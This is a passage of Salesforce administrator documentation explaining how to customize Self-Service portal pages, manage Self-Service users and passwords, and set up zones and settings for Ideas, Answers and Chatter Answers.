You can customize the content of the Self-Service Home Page from the Self-Service Portal Pages related list. The Home Page
is the first page that users see after they log in.

1. To customize this page, click Edit on the Home Page line.
2. You can enable the following features:

DescriptionFeature

Lists the titles of up to five solutions of your choice on the
Home Page.

Show Top Solutions List

Lists the open cases of the Self-Service user who is logged
in.

Show My Open Cases

The message that will be displayed at the top of the home
page. You can enter a message of up to 32,000 characters
including any HTML tags.

Show Message

3. If you enabled the message, enter your message in the text box, using the formatting toolbar to format the size, color, or
font.

Optionally, check Show HTML to view your page message in HTML code. You can’t save any JavaScript as part of your
custom code.

4. Optionally, insert any merge fields for data that you want to replace dynamically.
5. Click Save.
6. To see how your Home Page will look, click Preview on the Home Page line. If you have customized the Self-Service

style sheet, the preview shows your custom styles.
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Set the Top Solutions

If you checked Show Top Solutions List from the Home page, click Add in the Solutions related list of the Self-Service
Settings page to search for and select solutions to display on the Home page. You may only select solutions that have been
marked Visible in Self-Service Portal.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages

Enable the Solutions Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can enable the Self-Service Solutions Page from the Self-Service Portal Pages related list. The Solutions Page allows
users to see solutions that have been marked Visible in Self-Service Portal and any files attached to those solutions.

1. To enable this page, click Edit on the Solutions Page line.
2. Select the Show Solution Page checkbox.
3. Check Show Message to display a message at the top of the Solutions Page.
4. If you enabled the message, enter your message in the text box, using the formatting toolbar to format the size, color, or

font.

Optionally, check Show HTML to view your page message in HTML code. You can’t save any JavaScript as part of your
custom code.

5. Optionally, insert any merge fields for data that you want to replace dynamically.
6. Click Save.
7. To see how your Solutions Page will look, click Preview on the Solutions Page line. If you have customized the Self-Service

style sheet, the preview shows your custom styles.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages
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Customize the Log a Case Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can enable and customize the Log a Case Page from the Self-Service Portal Pages related list. The Log a Case Page allows
users to submit new cases to your customer support team. New cases submitted from this page will be automatically created
in Self-Service and assigned to the support representative or queue defined by your case assignment rules.

1. To allow users to submit cases from your Self-Service portal, click Edit on the Log a Case Page line.
2. Select the Show Log a Case Page checkbox.
3. Check Show Message to display a message on this page.
4. If you enabled the message, enter your message in the text box, using the formatting toolbar to format the size, color, or

font.

Optionally, check Show HTML to view your page message in HTML code. You can’t save any JavaScript as part of your
custom code.

5. Optionally, insert any merge fields for data that you want to replace dynamically.
6. Click Save.
7. To change the fields that display on the page, click the Page Layout link.

Note:  If a case field is tied to a validation rule, the rule can prevent Self-Service portal users from logging a case
if they do not have access to fill in that field. Consider making those fields visible on the Log A Case page.

8. Click Save at any time to finish.
9. To see how your Log a Case Page will look, click Preview on the Log a Case Page line. If you have customized the

Self-Service style sheet, the preview shows your custom styles.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages
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Customize the View Cases Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can enable and customize the View Cases Page from the Self-Service Portal Pages related list. The View Cases Page
allows users to view their open and closed cases, related solutions, completed activities, comments, and (optionally) to add
comments to their cases.

1. Click Edit on the View Cases Page line.
2. Select the Show View Cases Page box to allow users to view their open and closed cases.
3. Select Add Comments to Cases  to allow users to add comments to their cases. When a user adds a comment, an

email is automatically sent to the case owner.
4. Select Add Attachments to Cases  to allow users to upload files to their cases. When a user adds an attachment, an

email is automatically sent to the case owner.

When editing the page layout for the View Cases Page, add the Case Attachments related list to allow Self-Service users
to view the files they've added to their cases. Be aware that this related list also shows any files that support reps have added
to the case.

5. Check Show Message to display a message on this page.
6. If you enabled the message, enter your message in the text box, using the formatting toolbar to format the size, color, or

font.

Optionally, check Show HTML to view your page message in HTML code. You can’t save any JavaScript as part of your
custom code.

7. Optionally, insert any merge fields for data that you want to replace dynamically.
8. Click Save.
9. To change the fields and related lists that display on the page, click the Page Layout link.

Add the Case Activities related list to allow Self-Service users to view public, completed activities related to their cases.
You also need to set field-level security to visible for the Visible in Self-Service Portal checkbox on activity
page layouts so support reps will be able to display or hide completed activities in the Self-Service portal by clicking Make
Public or Make Private in the case's Activity History related list.

10. Click Save at any time to finish.
11. To see how your View Cases Page will look, click Preview on the View Cases Page line. If you have customized the

Self-Service style sheet, the preview shows your custom styles.
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Tip:  To hide specific cases from users in the portal, you can deselect the Visible in Self-Service Portal
checkbox on the case.

Note:  View Cases pages list cases in descending order via the Case Number field. Portal users cannot change this
order; nor can they sort case columns in the Self-Service portal.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages

Customize the Suggested Solutions Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can enable and customize the Suggested Solutions Page from the Self-Service Portal Pages related list. The Suggested
Solutions Page displays up to ten relevant solutions that may help users solve a particular case. When submitting a case or
viewing cases in the Self-Service portal, users can view suggested solutions and close their cases themselves.

To customize the Suggested Solutions Page:

1. Click Edit on the Suggested Solutions Page line.
2. Select Show Suggested Solutions Page to enable the page in the Self-Service portal.
3. Select a Self-Closed Case Status to show in the Status field for cases closed by Self-Service users. You must select

at least one “Closed” value for this field.
4. Choose the maximum number of suggested solutions to display to users at one time. You can show a maximum of ten.
5. Select the Self-Closed Case Reasons that Self-Service users can choose from when they self-close their cases.
6. Check Show Message to display a message on this page.
7. If you enabled the message, enter your message in the text box, using the formatting toolbar to format the size, color, or

font.

Optionally, check Show HTML to view your page message in HTML code.

You can’t save any JavaScript as part of your custom code.
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8. Optionally, insert any merge fields for data that you want to replace dynamically..
9. Click Save.
10. To see how your Suggested Solutions Page will look, click Preview on the Suggested Solutions Page line. If you have

customized the Self-Service style sheet, the preview shows your custom styles.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages

Create Your Custom Page Header and Footer Sections

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Apply your company’s branding to every page in your Self-Service portal by customizing your page headers and footers. Your
portal page headers and footers can contain a company logo, your company messaging, or your company’s colors.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Settings.
2. Click Edit next to the Page Header listed in the Portal Page Sections.
3. Check Show Header to display the header on your portal pages.
4. Check Show Header Separator to include a line separating the header from your body pages.
5. If desired, enter a page message. Use the format toolbar to format your page message. You cannot save any JavaScript as

part of your custom code.

Optionally, check Show HTML to view your page message in HTML code.

6. Click Save.
7. Click Edit next to the Page Footer listed in the Portal Page Sections.
8. Check Show Footer to display the footer on your portal pages.
9. Check Show Footer Separator to include a line separating the footer from your body pages.
10. If desired, enter a page message. Use the format toolbar to format your page message. You can’t save any JavaScript as part

of your custom code.

Optionally, check Show HTML to view your page message in HTML code.
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11. Click Save.

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages
Customize the Self-Service Style Sheet
Self-Service Page Attributes

Self-Service Page Attributes

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

The following is a list of Self-Service page attributes which can be modified with the point-and-click editor:

DescriptionPage Attribute

The color of the text.Color

The bolded value of the text. For example, whether the text
is bolded or not.

Bold

The size of the text.Font size

A specific style of type in which letters are displayed.Font

A prioritized list of font family names for an element. Web
browsers use the first font value recognized.

Font Family

The underline value of the text. For example, whether the text
is underlined or not.

Underline

The color of a border.Border Color

The style of a border, such as dotted, dashed, or solid.Border Style

The width of a border.Border Width
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DescriptionPage Attribute

The width of a bottom border.Bottom Border Width

The amount of space between the border and the element.Padding

The amount of space to put between the top border and the
element.

Padding Top

The amount of space to put between the right border and the
element.

Padding Right

The amount of space to put between the left border and the
element.

Padding Left

The amount of space to put between the bottom border and
the element.

Padding Bottom

The height of the element.Height

The height of a line.Line Height

The background color of the element.Background Color

The format in which the background image displays. For
example, whether the image displays repeatedly in a horizontal
or vertical format.

Background Repeat

The background image of the element. The relative or absolute
URL which hosts the image must be inside the surrounding

Background Image

URL() syntax. For example,
url(/sserv/img/tabBg_gray.gif).

See Also:
Setting Up Self-Service
Customizing Your Self-Service Pages
Customize the Self-Service Style Sheet
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Generating Login HTML

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To generate Self-Service portal HTML:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

After enabling and customizing your Self-Service portal, generate the URL or HTML code where users will log in to your
Self-Service portal.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Settings.
2. Click Generate Login HTML.
3. Insert the URL or HTML code provided into your portal’s Web page.
4. Click Finished to return to the Self-Service Settings page.

Note:  You can’t be logged into Salesforce and the Self-Service portal at the same time, with the same browser. For
example, if you log into Salesforce and then the Self-Service portal using the same browser, your Salesforce session
becomes invalid. Conversely, if you log into the Self-Service portal and then Salesforce using the same browser, your
Self-Service portal session becomes invalid.

See Also:
Setting Up Self-Service
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Displaying the Portals Tab
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

The Portals Tab is where you set up an online support channel for your Self-Service customers - allowing them to resolve
their inquiries without contacting a customer service representative.

To display the Portals tab, customize your display. If the Portals tab is not available to you, contact your administrator.

Note:  The Portals tab does not include the Customer Portal.

See Also:
Using the Portals Tab

Using the Portals Tab
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Self-Service Portal”To set up the Self-Service portal:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

The Portals Tab is where you set up an online support channel for your Self-Service customers - allowing them to resolve
their inquiries without contacting a customer service representative.
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Clicking on the Portals tab displays the portals home page. From there, you can:

• View your customer Self-Service portal home page.

• Click on your Self-Service portal pages to see how your customers will interact with them.

• Under Reports, click any report name to jump to that report.

• Select any of the links under Tools to access utilities for managing your Self-Service portal and Self-Service users.

Note:  The Portals tab does not include the Customer Portal.

See Also:
Displaying the Portals Tab

Managing Self-Service Users
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Self-Service users:

“Manage Self-Service Portal”

AND

“Edit Self-Service Users”

To mass manage Self-Service users:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Manage your Self-Service user information from a single place and make changes to more than one user at a time. Before your
customers can take advantage of the Self-Service portal, you must enable Self-Service access for each contact. You can enable
access for one contact at a time from the Contacts tab or for multiple contacts via the Self-Service setup pages.

• To enable Self-Service users individually from the Contacts tab, select a contact and click Enable Self-Service on the
contact’s detail page.

• To enable multiple Self-Service users at once, see Enabling Multiple Self-Service Users on page 2017.

• To change Self-Service user information, see Editing Self-Service User Information on page 2018.

• To reset Self-Service user passwords, see Resetting Self-Service User Passwords on page 2019.

See Also:
Setting Up Self-Service
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Enabling Multiple Self-Service Users

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Self-Service users:

“Manage Self-Service Portal”

AND

“Edit Self-Service Users”

To mass manage Self-Service users:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

You can perform mass actions for Self-Service user management such as enabling Self-Service access for many contacts at
once. Each contact must have an email address and must be associated with an account to be a Self-Service user.

To enable new users for your Self-Service portal:

1. From Setup, click Customize > Self-Service > Self-Service Portal > Users.
2. Click Enable New User(s).
3. Enter search criteria to compile a list of the contacts you want to enable and click Search.
4. Select the contacts you want to enable and click Next.
5. Modify Self-Service user information as necessary.
6. Select the Super User checkbox to enable the contact as a Self-Service super user who can view case information, add

comments, and upload attachments for all cases submitted by anyone in his or her company.
7. Click Save.

See Also:
Managing Self-Service Users
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Editing Self-Service User Information

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Self-Service users:

“Manage Self-Service Portal”

AND

“Edit Self-Service Users”

To mass manage Self-Service users:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Edit Self-Service user information to keep user information updated.

1. From Setup, click Customize > Self-Service > Self-Service Portal > Users.
2. Select the users you want to change.
3. Click Edit User(s).
4. Make any necessary changes to these records.
5. Click Save.

See Also:
Managing Self-Service Users
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Resetting Self-Service User Passwords

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Self-Service users:

“Manage Self-Service Portal”

AND

“Edit Self-Service Users”

To mass manage Self-Service users:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

If a Self-Service user loses his or her password, you can email a new password to him or her. To reset one or more Self-Service
users’ passwords:

1. From Setup, click Customize > Self-Service > Self-Service Portal > Users.
2. Select the users whose passwords you want to reset.
3. Click Reset Password(s).
4. Click OK.

See Also:
Managing Self-Service Users

2019

Managing Self-Service UsersSetting Up Customer Channels



ZONES FOR SALESFORCE COMMUNITIES AND CUSTOMER
PORTALS

Using Zones to Organize Communities
Ideas zones available in: Professional, Enterprise, Unlimited, and Developer Editions

Answers zones available in: Enterprise, Unlimited, and Developer Editions

Chatter Answers zones available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit a zone:

Note:  Starting with the Summer ’13 release, Chatter Answers and Ideas “communities” have been renamed to “zones.”

Zones organize ideas and questions into logical groups, with each zone having its own focus and unique ideas and questions.
Zones are shared by the Ideas, Answers, and Chatter Answers applications, allowing you to view and create zones from those
locations. Professional Edition organizations can have only one internal zone. All other editions can have up to 50 zones shared
between Ideas, Answers, and Chatter Answers.

Note:  If you need more than 50 zones, contact salesforce.com.

You can display a zone to the following types of users:

• Salesforce Communities users.

• Public users (requires setting up a Force.com site).

• Internal Salesforce users. Salesforce users can access all zones regardless of whether the community is internal-only or
displayed in a portal.

• Customer Portal or partner portal users.

• Service Cloud console users.

Note:  You cannot use Salesforce sharing rules to restrict access to zones. When you create a zone , you can restrict
access by selecting the portal where the zone should appear. Only the users assigned to that portal (and internal
Salesforce users) will be able to access that unless you expose it publicly using Force.com sites.

Users will see zones, search results, and content that are associated with the context defined by their user profile:

• Internal users with permission to see Ideas can see all zones in the default Chatter community. If internal users sign in to
a Chatter community, they see only those zones associated with that community.
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• Chatter community users see the zones associated with the community they’re signed in to.

• Portal users can see the zones associated with their portal.

• Portal users with access to both a portal and a Chatter community can see the zones associated with the portal or community
that they are currently signed in to.

• Users who are accessing the portal or community through an API can access all zones that they have access to in all contexts.

• Global searches in the internal application performed by internal users return results from all ideas that are available within
the organization. Searches performed by all other users in Salesforce Communities return results from the ideas that are
available within the community.

See Also:
Creating and Editing Zones

Creating and Editing Zones
Ideas zones available in: Professional, Enterprise, Unlimited, and Developer Editions

Answers zones available in: Enterprise, Unlimited, and Developer Editions

Chatter Answers zones available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit a zone:

To create a new zone or edit the details of an existing zone:

1. From Setup, click one of the following paths.

• Customize > Ideas > Zones
• Customize > Answers > Zones
• Customize > Chatter Answers > Zones

Zones are shared by the Ideas, Answers, and Chatter Answers applications, allowing you to view and create zones from
those locations.

2. Click Edit next to the zone you want to change or New to create a new zone.
3. Enter a unique name for your zone that clearly identifies the zone's purpose.

Answers can only have one zone displayed at a time.

4. Optionally, enter a description in plain text. HTML and other markup languages are not supported.
5. Select the Active checkbox to display the zone to your community.

You can't delete zones, so if you need to hide a zone, make sure Active isn't selected. All active zones are automatically
available from the Ideas tab, but you can only assign one active zone to Answers.

6. Select the Username Format to specify how usernames appear throughout the zone in posted questions and answers.
7. Specify where you want this zone displayed.
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• Community lets you select a community in which to display the zone. You can also select Visible Without
Authentication to allow guest users to view activity within the zone through the community without signing in.

• Internal Only displays the zone to internal users only. Portal and Salesforce Communities members can’t see
internal zones.

• Portal lets you select from a list of existing portals.

To make a zone publicly available, you must select the Customer Portal that you plan to expose publicly using Force.com
sites. Chatter Answers is supported on Force.com sites. Answers isn’t supported on Force.com sites.

Note:  If you re-assign a zone to another community, the items associated with that zone move to the new
community, as well. Users who are logged in to the original community can’t view the items that have been moved
to the new community, including from the Recent Items section of the sidebar column. If the zone is moved back
to the original community, the ability to view those items is restored.

8. To set up zones for Chatter Answers, follow these steps:

a. Select Enable for Chatter Answers to associate the zone with Chatter Answers.
b. Select Enable Private Questions to let customers post their questions privately to customer support (create

cases). If you don’t select this setting, support agents can still initiate private communications with customers.

c. In Visualforce Page That Hosts Your Zone’s Feeds, click  and choose the Visualforce page on which
questions, replies, and knowledge articles display.

The page you choose must include the chatteranswers:allfeeds component so that the zone is linked to your
Force.com site correctly. If you don’t choose a Visualforce page, one is automatically generated when you save your
zone. The generated page includes your zone’s ID so that topics, questions, and replies are associated with your specific
zone and can display on it. The page is named after your zone with a suffix of “_main,” for example, ZoneName_main.
The page also includes a language attribute that matches your organization’s default language.

You can use the NoSignIn Boolean attribute in the chatteranswers: allfeeds to remove all sign-in links from
your zone. Use this option when you have an external sign-in path and want to ensure that your users follow it instead
of the standard Chatter Answers sign-in. When the NoSignIn Boolean attribute is true, users can still search and
view publicly accessible content for the zone. If they already have a valid session, they can still post questions, replies,
vote, and flag content.

d. In Site That Hosts Your Zone, click  and choose the Force.com site on which you want to host the zone.

• If you associated the zone with a portal, you can enter a Force.com site domain.
• If you associated the zone with a Salesforce Community that does not require authentication for users to view zone

activity, we populate the Force.com site domain for you.

e. Optionally, in Email Notification URL, customize the URL that’s included in email notifications sent from the
zone.

The email notification URL is generated automatically to be adapted to the visibility settings of the zone, but it can
be modified to fit specific needs or use cases. If you have a customized login page, enter its URL. For example, if you’ve
created a login page from which users can access multiple zones, you can customize Email Notification URL to
redirect users to that page from email notifications.

f. In Customer Support Agents Group, select the public group of users who will act as support agents for the zone.
These users will have a headset icon next to their username in the zone.

g. Optionally, in Header or Footer, click  and choose a text or HTML file that incorporates your organization’s
branding into the headers or footers of email notifications sent from the zone.
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You can only choose a file that has been uploaded to a publicly accessible folder on the Documents tab and marked
Externally Available Image. The files you include in the fields can have a combined size of up to 10 KB.

h. Select the data categories that you want exposed to the zone from the list of pre-defined data categories.

9. To set up Ideas for the zone, use the Experts group field to select the public group of experts who will monitor the
zone for Ideas.

10. Click Save.

See Also:
Selecting Picklist Values and Defaults for a Zone
Enabling Ideas in the Customer Portal
Designating Community Experts
Administrator setup guide: Salesforce Ideas Implementation Guide

ANSWERS COMMUNITIES

Setting Up Answers
Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To customize answers settings:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

To set up answers:

1. Enable answers and set the default zone.
2. Create a category group for answers and add data categories to the category group.

Note: Even though you can create up to five hierarchy levels of categories in a category group, only the first level
of categories is supported in your answers community. Child categories below the first level are not displayed in
the community, and community members can't assign these child categories to questions.

3. Assign the data categories to your answers community.
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4. Review the category group visibility settings to decide how you want to restrict access to categories and categorized questions
in the answers community.

5. Using roles, permission sets, or profiles:

a. Customize data category group visibility.
b. (Optional) Designate default category group visibility for users without visibility through roles, permission sets, or

profiles.

6. (Optional) To allow community members who work with cases to escalate an unanswered or problematic question to a
new case:

a. From Setup, click Customize > Cases > Page Layouts, and edit the case page layouts to include the Question field.
b. From Setup, click Customize > Cases > Fields, and ensure that field-level security for the Question field makes the

field visible in the necessary profiles.

Only community members who have permission to create cases will see an Escalate to Case option on questions.

7. (Optional) If your organization uses Salesforce Knowledge, users can convert particularly helpful replies into articles in the
knowledge base. From Setup, click Customize > Knowledge > Settings and ensure that Allow users to create
an article from a reply is checked.

8. (Optional) Create validation rules for questions and replies to prevent offensive language from being posted to the answers
community.

To create validation rules, from Setup, click Customize > Answers > Question > Validation Rules and Customize >
Answers > Reply > Validation Rules.

9. (Optional) Create workflow rules for questions. For example, you may want to create a workflow rule that sends the
community administrator an email whenever a question has ten or more replies but no best answer. Questions do not
support approval processes or workflow tasks.

10. (Optional) Create reports for your answers community.
11. (Optional) Enable answers in your Customer Portal or enable answers in your partner portal.

Tip: Any custom fields you create for questions or replies can’t display in the Salesforce user interface. However, you
can add custom fields to questions or replies for API integration purposes. For example, add a custom text field to
questions and use the API to populate that text field with the name of the country from which each question is posted.

See Also:
Creating and Editing Zones
Salesforce Answers Implementation Guide
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Enabling Answers and Assigning the Default Zone

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To customize answers settings:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Answers is a feature of the Community application that enables users to ask questions and have community members post
replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question can mark
one reply as the best answer.

To enable the answers feature:

1. From Setup, click Customize > Answers > Settings.
2. Click Edit.
3. Use the Enable Answers checkbox to enable answers.

Enabling answers adds the Answers tab to the Community application and creates azone named Internal Zone.

4. Select the default zone for the Answers tab. You can only display one answers zone at a time. You can either use Internal
Zone as the default or create a new zone and use it as the default.

5. Click Save.

See Also:
Creating and Editing Zones
Salesforce Answers Implementation Guide
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Assigning Data Categories to Answers

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To customize answers settings:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

In an answers zone, a category group provides one or more categories that help organize questions for easy browsing. If the
category group contains a hierarchy, only the first-level categories display on the Answers tab. For example, if you're a computer
manufacturer you might create a Products category group for your Products zone that has four categories: Performance Laptops,
Portable Laptops, Gaming Desktops, and Enterprise Desktops. Zone members can choose one of the categories to assign to
a question.

The following example shows how the categories within a category group appear on the Answers tab.

Figure 11: Answers tab displaying categories

1. The zone assigned to answers.
2. When you assign a category group to answers, the data categories within the group appear beneath the zone name on the

Answers tab. Zone members can assign these categories to their questions and browse within categories to see related
questions. The name of the category group isn't displayed within the answers community.
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The name of the category group is not displayed in the answers community; however, all the categories within the group appear
below the zone name on the Answers tab.

To assign a category group to answers:

1. Create a category group for answers and add data categories to the category group.

We recommend naming the category group the same as the answers community so other administrators understand where
the category group is being used.

Note: Even though you can create up to five hierarchy levels of categories in a category group, only the first level
of categories is supported in your answers community. Child categories below the first level are not displayed in
the community, and community members can't assign these child categories to questions.

2. From Setup, click Customize > Answers > Data Category Assignments. The category group assignments page only
displays after you enable answers.

3. Click Edit.
4. Select the category group you want to assign to your answers zone.

Note:  If you change the category group for answers later, all the existing categories associated with your questions
are removed. The questions in your answers community become uncategorized until community members assign
the new categories to them.

5. Click Save.

You receive an email after the save process completes.

See Also:
What are Data Categories?

IDEAS COMMUNITIES

Encourage Idea Creation and Sharing in Salesforce
Communities

Add your Ideas users to Salesforce Communities to take advantage of new ways to collaborate.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Ideas settings for Salesforce Communities:
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Create more engagement and collaboration around Ideas as you enable your customers to post and comment on Ideas right
from their Salesforce Communities home page. Adding Ideas to Salesforce Communities lets your users reap the benefits of
a vibrant, creative partnership between community members. Communities are customizable, public or private spaces for
employees, customers, and partners to collaborate on best practices and business processes. When you enable Ideas in Salesforce
Communities, you give your community members the ability to create ideas and idea themes and have a dialog around them.
You can create public communities that let your customers or partners exchange ideas, as well as private internal communities
that are specific to your employees.

Moderating and managing ideation communities can be assigned to internal community members, depending on their privileges.
Internal users can moderate both internal and external communities because they have access to internal communities as well
as any public communities that they have permission to access.

To organize your community into smaller groups, you can create zones within a community that reflect special interests,
product groupings, or types of customers. Zones are shared by the Ideas, Answers, and Chatter Answers applications, allowing
you to view and create zones from those locations. For example, if you're a computer manufacturer you can create a community
named Laptop Products and another named Desktop Products. Within each of those communities, you can create zones that
are specific to different aspects of the products.

Community members have visibility into different zones based on their user profiles:

• Internal users with permission to see Ideas can see all zones in the default Chatter community. If internal users sign in to
a Chatter community, they see only those zones associated with that community.

• Chatter community users see the zones associated with the community they’re signed in to.

• Portal users can see the zones associated with their portal.

• Portal users with access to both a portal and a Chatter community can see the zones associated with the portal or community
that they are currently signed in to.

• Users who are accessing the portal or community through an API can access all zones that they have access to in all contexts.

• Global searches in the internal application performed by internal users return results from all ideas that are available within
the organization. Searches performed by all other users in Salesforce Communities return results from the ideas that are
available within the community.

Managing Ideas
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To manage Ideas communities:

Ideas is a community of users who post, vote for, and comment on ideas. Consider it an online suggestion box that includes
discussions and popularity rankings for any subject. To further organize your community into smaller groups, you can create
zones within a community that reflect special interests, product groupings, or types of customers.

You can display Ideas to internal Salesforce users, a Salesforce.com Community, Customer Portal or partner portal users, or
to public users (requires setting up a Force.com site). You can also manage Ideas from the console.

Professional Edition organizations can have only one internal zone. All other editions can have up to 50 zones shared between
Ideas, Answers, and Chatter Answers.
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As an administrator, you can:

• Control whether ideas are enabled for your organization and customize the half-life of ideas. See Customizing Ideas
Settings on page 2029.

• Create zones to organize ideas. See Creating and Editing Zones on page 2021.

• Create Idea Themes that let you invite community members to post ideas about specific topics so that members can solve
problems or propose innovations for your company.

• Define picklist values for the Categories and Status fields. See Defining Picklist Values for the Categories and Status
Fields on page 2035.

• Specify the layout of custom fields. See Setting Page Layouts for Ideas on page 2032.

• Make idea reports available to your users.

• Customize idea search layouts.

• Merge ideas to reduce the number of duplicate ideas.

• Assign a status to an idea.

• Delete a vote through the API to erase all history that the vote ever occurred.

Specifically, deleting a vote does the following:

◊ Removes 10 points from the idea's overall score

◊ Removes the user's name from the Last 100 Votes section on the idea's detail page

See Also:
Enabling Ideas in the Customer Portal
Administrator setup guide: Salesforce Ideas Implementation Guide

Customizing Ideas Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Ideas settings:

To manage organization-wide settings for Ideas:

1. From Setup, click Customize > Ideas > Settings.
2. Click Edit.
3. Use the Enable Ideas checkbox to enable or disable Ideas for your organization.

Disabling Ideas removes the Ideas tab and users will no longer be able to access active zones, but these zones will reappear
on the Ideas tab the next time you enable Ideas.

4. Optionally, select Enable Text-Formatting, Images and Links to enable the Ideas HTML editor, which gives
users WYSIWYG HTML editing and image referencing capabilities when they post or comment on ideas.
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Warning: Once you enable the Ideas HTML editor, you cannot disable it. If you do not see the Enable
Text-Formatting, Images and Links checkbox, the Ideas HTML editor is enabled for your organization
by default.

5. If your organization does not already have the multi-select Categories field enabled, click the Enable button located
below the Categories message at the top of the page. This button is not displayed if your organization already has the
Categories field enabled.

If the Categories field is already enabled, the Enable Categories checkbox is selected. Once the field is enabled,
you cannot disable it.

6. Select Enable Reputation to let users earn points and ratings based on their activity in each zone.
7. In the Half-Life (in Days) field, enter a number of days.

The half-life setting determines how quickly old ideas drop in ranking on the Popular Ideas subtab, to make room for
ideas with more recent votes. A shorter half-life moves older ideas down the page faster than a longer half-life.

Note:  This field does not appear if Ideas is disabled. To modify the Half-Life (in Days) field, save your
changes after enabling ideas, and then click Edit on the Ideas Settings page.

8. Click Save.

See Also:
Enabling Idea Themes
Managing Ideas
Administrator setup guide: Salesforce Ideas Implementation Guide
Encouraging Innovation with Idea Reputation

Encouraging Innovation with Idea Reputation
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Reward the most influential and innovative members of your Ideas community by acknowledging their participation and
contribution to the community. By enabling Reputation in Ideas, and then choosing level names and thresholds, you let users
earn points and ratings that reward and encourage frequent, meaningful activity in the community. As community members
engage more frequently, they improve the overall quality of ideas, which means that everyone reaps the benefits of a vibrant,
creative partnership with your customers.

Users are awarded points for many activities including:

• Creating an idea

• Receiving a comment on their idea

• Receiving an upvote on their idea

• Commenting on someone else’s idea

Reputation points are calculated separately for each zone, and for the cumulative activity within the entire organization. Users
